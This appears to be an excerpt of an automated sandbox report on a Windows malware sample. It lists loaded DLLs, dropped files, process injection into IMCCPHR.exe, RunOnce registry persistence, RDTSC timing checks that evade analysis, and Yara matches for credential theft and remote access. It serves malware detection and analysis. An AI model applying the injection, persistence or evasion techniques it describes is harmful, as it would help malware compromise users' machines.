Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe File written: C:\Users\user\AppData\Local\Temp\Lavridss112\menneskevrdigstes\Barnagtigt138.ini Jump to behavior
Source: 25FC004658_Femetagershusenes.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Source: Yara match File source: 00000000.00000002.2942202827.0000000008A4C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.3750256172.000000000760C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_10001B18 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_10001B18
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe File created: C:\Users\user\AppData\Local\Temp\nshBC5B.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe File created: C:\Users\user\AppData\Local\Temp\Ddbiderens\Funktionsafprvningerne.exe Jump to dropped file
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Omsadlings Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Omsadlings Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Omsadlings Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Omsadlings Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe API/Special instruction interceptor: Address: 8E70697
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe API/Special instruction interceptor: Address: 7A30697
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe RDTSC instruction interceptor: First address: 8E1AE6F second address: 8E1AE6F instructions: 0x00000000 rdtsc 0x00000002 clc 0x00000003 cmp ebx, ecx 0x00000005 jc 00007F31A44F07B3h 0x00000007 cmp dx, 6F9Ch 0x0000000c inc ebp 0x0000000d inc ebx 0x0000000e cld 0x0000000f rdtsc
Source: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe RDTSC instruction interceptor: First address: 79DAE6F second address: 79DAE6F instructions: 0x00000000 rdtsc 0x00000002 clc 0x00000003 cmp ebx, ecx 0x00000005 jc 00007F31A48344D3h 0x00000007 cmp dx, 6F9Ch 0x0000000c inc ebp 0x0000000d inc ebx 0x0000000e cld 0x0000000f rdtsc
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nshBC5B.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_00405974 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose, 0_2_00405974
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_004064C6 FindFirstFileW,FindClose, 0_2_004064C6
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_004027FB FindFirstFileW, 0_2_004027FB
Source: IMCCPHR.exe, 00000005.00000002.3758334137.0000000009078000.00000004.00000020.00020000.00000000.sdmp, IMCCPHR.exe, 00000005.00000002.3758334137.00000000090D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_00402E41 GetTempPathW,GetTickCount,GetModuleFileNameW,LdrInitializeThunk,GetFileSize,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,CreateFileW,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk, 0_2_00402E41
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_10001B18 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,lstrcpyW,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleW,LdrInitializeThunk,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_10001B18

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Thread created: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe EIP: 79DAB97 Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Memory written: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe base: 4260000 Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Process created: C:\Windows\SysWOW64\IME\SHARED\IMCCPHR.exe "C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe" Jump to behavior
Source: C:\Users\user\Desktop\25FC004658_Femetagershusenes.exe Code function: 0_2_004061A5 GetVersion,LdrInitializeThunk,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW, 0_2_004061A5

Stealing of Sensitive Information

Source: Yara match File source: 00000005.00000002.3759141152.000000000AA30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: IMCCPHR.exe PID: 5000, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000005.00000002.3759141152.000000000AA30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: IMCCPHR.exe PID: 5000, type: MEMORYSTR